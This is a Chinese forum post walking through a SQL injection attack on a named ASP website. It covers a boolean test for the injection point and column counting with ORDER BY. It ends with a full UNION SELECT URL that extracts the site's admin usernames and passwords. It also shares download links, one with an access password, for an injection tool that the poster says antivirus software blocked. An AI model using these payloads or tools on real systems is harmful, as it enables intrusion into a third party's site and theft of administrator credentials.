@Future 既然提到注入了 我就来讲一下
一°判断asp注入点
注入站:
http://www.yadumx.com网址后加 and 1=1 和 and 1=2 判断,1=1时正常 1=2 时错误 说明存在注入。

二°开始注入
既然是注入了,直接开始猜字段,用 ‘order by 数字’ 来猜字段数。

说明字段数是17 一般表都会是admin 我们直接在admin表来查询

说明存在admin 我们来把字段2 和字段10 改成username 和 password 试试。

猜了好多字段都不行 怎么办呢 纠结,我们来到后台看看。

通过后台查看源码得知字段为admin_name admin_pass 然后就爆出用户和密码。

。
http://www.yadumx.com/news_show.asp?id=571 UNION SELECT 1,admin_name,3,4,5,6,7,8,9,admin_pass,11,12,13,14,15,16,17 from admin当然也可以用工具,更快速。

三°结束
我用的注入工具
http://yunpan.cn/QCtunmZ8qdGTN 访问密码 ba79
分享给大家。
上面的被360屏蔽了
你们可以在这上面下载 无毒
@HW,
http://www.jb51.net/softs/41531.html
@1973Simona,没事什么都不会做的